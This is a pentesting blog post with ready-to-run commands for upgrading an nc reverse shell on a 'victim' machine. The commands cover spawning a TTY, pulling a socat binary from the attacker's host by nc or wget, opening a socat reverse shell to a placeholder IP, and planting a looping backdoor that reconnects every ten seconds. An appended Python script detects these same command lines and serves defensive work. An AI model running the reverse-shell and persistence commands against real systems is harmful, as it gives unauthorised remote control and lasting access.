Methods to Upgrade nc Reverse Shells

pentesting shell

Ended up with a cheap nc shell and want to upgrade to a “real” shell with a proper TTY and navigation?

Say no more <:

1. Upgrading using shell magic

This doesn’t always work, but if Python is present on the victim’s machine it’s worth a try.

  1. Use bash on the attacker machine; zsh doesn’t seem to work.
  2. Get the nc shell.
  3. In the shell, execute

         python -c 'import pty; pty.spawn("/bin/sh")'

     to allocate a TTY in the nc session.
  4. Execute

         export TERM=xterm-256color

     for proper color support.
  5. Put the shell into the background using CTRL+Z.
  6. Configure the local shell using stty raw -echo.
  7. Execute fg to bring the nc shell back.
  8. Type reset and press enter.

Now a proper shell should be present which doesn’t close the connection upon CTRL+C <:

If this didn’t work, try the next method:

2. Upgrading using socat

The tool socat can be used to create proper shell sessions. For this, a static binary of the tool is required, which can be downloaded here.

First, transfer the socat binary to the victim’s machine using nc or wget:

The nc method:

a) Use nc -vvlp 1337 < socat to start a server which pushes the binary to the connecting machine.

b) On the victim, download the file with nc <IP> <PORT> > /tmp/socat. You have to stop the transfer manually once the file is complete, because nc won’t terminate on its own.

The wget method:

a) Attacker: cd into the folder containing the binary and execute python -m SimpleHTTPServer <PORT>.

b) On the victim, execute

       cd /tmp && wget http://<IP>:<PORT>/socat

to download the file from the attacker’s machine.

After that, it’s time to spawn the shell:

  1. Create a socat listener on the attacking machine with

         socat file:`tty`,raw,echo=0 tcp-listen:4444

  2. Spawn a proper reverse shell from the nc shell on the victim’s box using

         socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP>:4444

Fixing width

In case the width of the shell is too small, it can be fixed like this:

  1. In a new terminal, execute stty -a to display the number of rows and columns normally used on the attacker’s machine.
  2. In the (socat) shell, use stty rows <num> cols <num> to set the same size.

APT-style persistence

Create a lazy backdoor shell on the victim’s machine:

    while true; do sleep 10; socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP>:<PORT>; done &

In case a previous shell breaks, just set up a new listener and the backdoor reconnects within ten seconds, without the need to run the exploit again. Or use tsh.
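Each of the steps above leaves a distinctive command line on the victim: the pty.spawn one-liner, the socat exec/pty reverse shell, the while-true reconnect loop, and the nc file transfer into /tmp. As an added example that is not part of the original post, here is a small Python script a defender could run over `ps -eo pid,args` output (or any process-creation log that records the full argument string) to flag those patterns. The sample process list, its PIDs and the 10.0.0.5 address are constructed for the example.

```python
"""Flag the shell-upgrade and socat-backdoor command lines from the post
in a process listing. Added example, not part of the original post."""
import re
from dataclasses import dataclass

# Ordered most specific first: the reconnect loop also contains a socat
# exec/pty shell, so it must be tested before the plain socat pattern.
PATTERNS = [
    ("socat-backdoor-loop", re.compile(r"while\s+true.*\bsocat\b.*exec:.*\btcp:")),
    ("socat-pty-shell", re.compile(r"\bsocat\b.*exec:.*\bpty\b.*\btcp:[\w.\-]+:\d+")),
    ("pty-upgrade", re.compile(r"python[0-9.]*\s+-c\s+.*pty\.spawn\(")),
    ("nc-file-transfer", re.compile(r"\bnc\b.*\s\d+\s*>\s*/tmp/")),
]


@dataclass
class Finding:
    pid: str
    technique: str
    cmdline: str


def classify(cmdline):
    """Return the name of the first matching technique, or None."""
    for name, rx in PATTERNS:
        if rx.search(cmdline):
            return name
    return None


def scan_ps_output(text):
    """Parse `ps -eo pid,args` style output and return a list of Findings.

    The first whitespace-separated field is the PID, the rest is the
    command line; a leading 'PID' header line is skipped.
    """
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("PID"):
            continue
        pid, _, args = line.partition(" ")
        technique = classify(args)
        if technique:
            findings.append(Finding(pid, technique, args))
    return findings


# Constructed sample listing: one benign process, one benign socat use,
# and the four command lines from the post (IP 10.0.0.5 is made up).
SAMPLE_PS = """PID ARGS
1 /sbin/init
4122 python -c import pty; pty.spawn("/bin/sh")
4130 /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.5:4444
4141 /bin/sh -c while true; do sleep 10; socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.5:4444; done
4150 sh -c nc 10.0.0.5 1337 > /tmp/socat
4160 socat - TCP:localhost:80
"""

if __name__ == "__main__":
    for f in scan_ps_output(SAMPLE_PS):
        print(f"pid={f.pid:<6} {f.technique:<22} {f.cmdline}")
```

The benign `socat - TCP:localhost:80` line is deliberately included: the patterns key on the exec:/pty/tcp: combination rather than on the binary name, so ordinary socat relays are not flagged. Running the script prints the four suspicious PIDs with their technique labels.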
